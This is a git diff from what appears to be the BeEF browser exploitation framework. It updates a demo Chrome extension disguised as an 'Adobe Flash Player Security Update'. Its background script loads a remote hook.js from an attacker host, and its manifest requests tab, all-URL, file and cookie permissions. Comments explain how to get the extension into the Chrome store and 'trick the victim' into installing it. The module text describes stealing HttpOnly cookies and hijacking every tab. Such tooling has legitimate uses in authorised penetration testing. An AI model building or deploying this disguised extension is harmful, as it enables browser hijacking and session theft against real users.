diff --git a/extensions/demos/flash_update_chrome_extension/background.js b/extensions/demos/flash_update_chrome_extension/background.js
index aa364ae45..ff6c7b92a 100644
--- a/extensions/demos/flash_update_chrome_extension/background.js
+++ b/extensions/demos/flash_update_chrome_extension/background.js
@@ -6,5 +6,6 @@
d=document;
e=d.createElement('script');
-e.src="http://127.0.0.1:3000/hook.js";
-d.body.appendChild(e);
+e.src="https://192.168.0.2/hook.js";
+d.body.appendChild(e);
+
diff --git a/extensions/demos/flash_update_chrome_extension/manifest.json b/extensions/demos/flash_update_chrome_extension/manifest.json
index 7e2c4fa44..78b46fe06 100644
--- a/extensions/demos/flash_update_chrome_extension/manifest.json
+++ b/extensions/demos/flash_update_chrome_extension/manifest.json
@@ -1,26 +1,34 @@
{
- // Simple chrome extension
- // Just loads beef into the extension context.
- //
- // You may need to set the IP address of the beef hook in background.js
- // Then you can pack the extension (from within the chrome extensions page) and add the crx file to extensions/demos/html/
+ // Simple chrome extension, by antisnatchor and Mike Haworth
+ // Just loads BeEF into the extension context.
+ //
+ // 1. You need to set the IP address (better the domain) of the BeEF hook in background.js
+ // 2. The BeEF hook address must be == to the CSP allowed domain here below. BeEF must listen on port 443, with TLS enabled.
+ // Only localhost origin is allowed to load scripts from non HTTPS resources. For anything else, you must use HTTPS.
+ // 4. You need to upload the extension, as a zip file, to Google Chrome store.
+ // In latest versions of Chrome (>= 21) you can't install an extension from a different location anymore,
+ // so the extension can't be served by BeEF anymore. You need to trick the victim to install
+ // the extension from Google Chrome store.
+ //
- "name": "Adobe Flash Player",
- "version": "11.2.202.235",
- "description": "Introduces vulnerabilites into web browsers",
- "background": {
- "scripts": ["background.js"]
- },
- "icons": {
- "16": "icon16.png",
- "48": "icon48.png",
- "128": "icon128.png"
- },
- "permissions": [
- "tabs",
- "http://*/*",
- "https://*/*",
- "file://*/*",
- "cookies"
- ]
+ "name": "Adobe Flash Player Security Update",
+ "manifest_version": 2,
+ "version": "11.5.502.149",
+ "description": "Updates Adobe Flash Player with latest securty updates",
+ "background": {
+ "scripts": ["background.js"]
+ },
+ "content_security_policy": "script-src 'self' 'unsafe-eval' https://192.168.0.2; object-src 'self'",
+ "icons": {
+ "16": "icon16.png",
+ "48": "icon48.png",
+ "128": "icon128.png"
+ },
+ "permissions": [
+ "tabs",
+ "http://*/*",
+ "https://*/*",
+ "file://*/*",
+ "cookies"
+ ]
}
diff --git a/modules/social_engineering/fake_flash_update/config.yaml b/modules/social_engineering/fake_flash_update/config.yaml
index c62fcb60d..8922b69dc 100644
--- a/modules/social_engineering/fake_flash_update/config.yaml
+++ b/modules/social_engineering/fake_flash_update/config.yaml
@@ -9,7 +9,7 @@ beef:
enable: true
category: "Social Engineering"
name: "Fake Flash Update"
- description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.
A Chrome extension has privileged access and can do a whole lot.. - - Access all tabs and inject beef into all tabs
- - Use hooked browser as a proxy to do cross domain requests
- - Get all cookies including HTTPonly cookies
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded.
The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
+ description: "Prompts the user to install an update to Adobe Flash Player.
The file to be delivered could be a Chrome or Firefox extension.
A Chrome extension has privileged access and can do a whole lot.. - - Access all tabs and inject beef into all tabs
- - Use hooked browser as a proxy to do cross domain requests
- - Get all cookies including HTTPonly cookies
See chrome extensions beef modules for more examples
See extensions/demos/flash_update_chrome_extension for extension source. Note: the Chrome extension delivery will work on Chrome <= 20. From Chrome 21 things changed in terms of how extensions can be loaded. See extensions/demos/flash_update_chrome_extension/manifest.json for more info and a sample extension that works on latest Chrome.
The Firefox extension is disabling PortBanning (ports 20,21,22,25,110,143), enabling Java, overriding the UserAgent and the default home/new_tab pages.
See extensions/ipec/files/LinkTargetFinder dirrectory for the Firefox extension source."
authors: ["mh", "antisnatchor"]
target:
user_notify: ['ALL']